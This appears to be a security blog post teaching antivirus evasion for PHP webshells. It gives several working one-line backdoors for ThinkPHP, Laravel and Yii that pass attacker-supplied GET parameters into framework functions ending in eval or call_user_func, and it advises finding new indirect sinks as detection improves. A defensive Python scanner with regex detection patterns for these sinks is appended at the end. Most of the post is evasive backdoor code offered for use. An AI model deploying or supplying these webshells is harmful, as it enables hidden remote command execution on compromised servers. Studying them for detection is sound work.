What? You still can't do webshell AV evasion?
VSole, 2022-07-28 17:09:46
Framework-based evasion

ThinkPHP

The array_map_recursive function

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "ThinkPHP/Common/functions.php");
array_map_recursive(I('get.func', '', ''), I('get.cmd', '', ''));
```

Analysis of array_map_recursive

The function passes every element of $data to call_user_func with the caller-supplied callable, so whoever controls $filter controls which function is executed.

```php
function array_map_recursive($filter, $data) {
    $result = array();
    foreach ($data as $key => $val) {
        $result[$key] = is_array($val)
            ? array_map_recursive($filter, $val)
            : call_user_func($filter, $val);
    }
    return $result;
}
```

Evasion result (screenshot not preserved)
The B function

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "ThinkPHP/Common/functions.php");
include(WWW_PATH . "ThinkPHP/Library/Think/Hook.class.php");
class demo {
    function test($v) {
        I('get.func', '', '')($v);
    }
}
B("demo", "test", I('get.cmd', '', ''));
```

Evasion result (screenshot not preserved)
Analysis of B

```php
function B($name, $tag = '', &$params = NULL) {
    if ('' == $tag) {
        $name .= 'Behavior';
    }
    return \Think\Hook::exec($name, $tag, $params);
}
```

Analysis of exec

exec instantiates a class and calls a method on it, with the class name, the method name and the argument all supplied by the caller.

```php
static public function exec($name, $tag, &$params = NULL) {
    if ('Behavior' == substr($name, -8)) {
        // Behavior extensions must use the run entry method
        $tag = 'run';
    }
    $addon = new $name();
    return $addon->$tag($params);
}
```
The smarty_php_tag function

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "ThinkPHP/Library/Vendor/Smarty/SmartyBC.class.php");
smarty_php_tag("", I('get.cmd', '', ''), "");
```

Evasion result (screenshot not preserved)
Analysis of smarty_php_tag

This is a direct eval of the $content parameter, and that parameter is caller-controlled.

```php
function smarty_php_tag($params, $content, $template, &$repeat)
{
    eval($content);
    return '';
}
```
The I function

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "ThinkPHP/Common/functions.php");
I('get.func', '', '')(I('get.cmd', '', ''));
```

Evasion result (screenshot not preserved)
Laravel

EvalLoader#load

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "/vendor/autoload.php");
$c = new Mockery\Generator\MockConfiguration(array(), array(), array(), 'demo');
$b = new Mockery\Generator\MockDefinition($c, '<?=' . $_GET['cmd']);
$a = new Mockery\Loader\EvalLoader();
$a->load($b);
```

Evasion result (screenshot not preserved)
Analysis of EvalLoader#load

The mock definition's code is passed straight to eval, and that code is caller-controlled.

```php
class EvalLoader implements Loader
{
    public function load(MockDefinition $definition)
    {
        if (class_exists($definition->getClassName(), false)) {
            return;
        }
        eval("?>" . $definition->getCode());
    }
}
```
MockTrait#generate

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "/vendor/autoload.php");
$a = new PHPUnit\Framework\MockObject\MockTrait($_GET['cmd'], 'demo');
$a->generate();
```

Evasion result (screenshot not preserved)
Analysis of MockTrait#generate

generate evals the class code passed to the constructor whenever no class of that name is loaded yet.

```php
public function generate(): string
{
    if (!\class_exists($this->mockName, false)) {
        eval($this->classCode);
    }
    return $this->mockName;
}
```
Yii

MockTrait#generate (PHPUnit is pulled in through the same vendor autoloader)

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "/vendor/autoload.php");
$a = new PHPUnit\Framework\MockObject\MockTrait($_GET['cmd'], 'demo');
$a->generate();
```

Evasion result (screenshot not preserved)
View#evaluateDynamicContent

```php
<?php
define('WWW_PATH', str_replace('\\', '/', realpath(dirname(__FILE__) . '/../')));
include(WWW_PATH . "/vendor/autoload.php");
$a = new yii\base\View();
$a->evaluateDynamicContent($_GET['cmd']);
```

Evasion result (screenshot not preserved)
Analysis of View#evaluateDynamicContent

The method is a thin wrapper around eval, returning whatever the evaluated statements return.

```php
public function evaluateDynamicContent($statements)
{
    return eval($statements);
}
```
Summary

By including framework files and substituting the framework's built-in functions for the function that does the work in a one-line trojan, the shell bypasses signature matching. If detection rules are later strengthened, new functions can be located that reach the same sink indirectly, much like a deserialization gadget chain. There are of course many other usable functions that are not listed here.
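The detection-side counterpart to the summary above, as an added example that is not part of the original post: a small scanner that, instead of matching eval/assert by name, flags the indirect sinks this post walks through (array_map_recursive, B, smarty_php_tag, EvalLoader, MockTrait, evaluateDynamicContent, and a request value invoked as a callable) and only raises a verdict when request-derived input reaches one of them. The sink list, the scoring and both sample files are my own constructions, not any vendor's rule set.

```python
import re

# Framework entry points the post shows reaching eval()/call_user_func() indirectly.
INDIRECT_SINKS = {
    "array_map_recursive": re.compile(r"\barray_map_recursive\s*\("),
    "B (Think\\Hook::exec)": re.compile(r"\bB\s*\("),
    "smarty_php_tag": re.compile(r"\bsmarty_php_tag\s*\("),
    "EvalLoader::load": re.compile(r"EvalLoader\b"),
    "MockTrait::generate": re.compile(r"MockTrait\b"),
    "View::evaluateDynamicContent": re.compile(r"evaluateDynamicContent\s*\("),
    # I('get.x')(...) : a request value invoked directly as a callable
    "dynamic call of I() result": re.compile(r"\bI\s*\([^)]*\)\s*\("),
}
# Request-derived input: PHP superglobals or ThinkPHP's I('get.xxx') helper.
TAINT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|\bI\s*\(\s*['\"](get|post|param|request)\.")
# A framework file pulled in to make those sinks available.
FRAMEWORK_INCLUDE = re.compile(
    r"\b(include|require)(_once)?\b.*(ThinkPHP/|vendor/autoload\.php|SmartyBC\.class\.php)")

def scan_php(source: str) -> dict:
    """Score one PHP source: which sinks appear, whether tainted input and a framework include appear."""
    sinks = [name for name, rx in INDIRECT_SINKS.items() if rx.search(source)]
    tainted = TAINT.search(source) is not None
    framework = FRAMEWORK_INCLUDE.search(source) is not None
    # A sink fed by request input is the webshell pattern; a sink alone only merits a look.
    if sinks and tainted:
        verdict = "suspicious"
    elif sinks:
        verdict = "review"
    else:
        verdict = "clean"
    return {"sinks": sinks, "tainted_input": tainted,
            "framework_include": framework, "verdict": verdict}

# Constructed samples: a loader of the smarty_php_tag kind shown above, and a benign page
# that uses the same I() helper and framework include but has no code-execution sink.
SHELL_SAMPLE = """<?php
include(WWW_PATH."ThinkPHP/Library/Vendor/Smarty/SmartyBC.class.php");
smarty_php_tag("",I('get.cmd','',''),"");
"""
BENIGN_SAMPLE = """<?php
include(WWW_PATH."ThinkPHP/Common/functions.php");
$name = I('get.name','','htmlspecialchars');
echo "Hello ".$name;
"""

if __name__ == "__main__":
    for label, src in (("shell", SHELL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_php(src))
```

The benign sample shows why the include and the I() call alone are not enough to raise an alert: both are ordinary in a ThinkPHP project, so the rule keys on the sink plus the tainted argument.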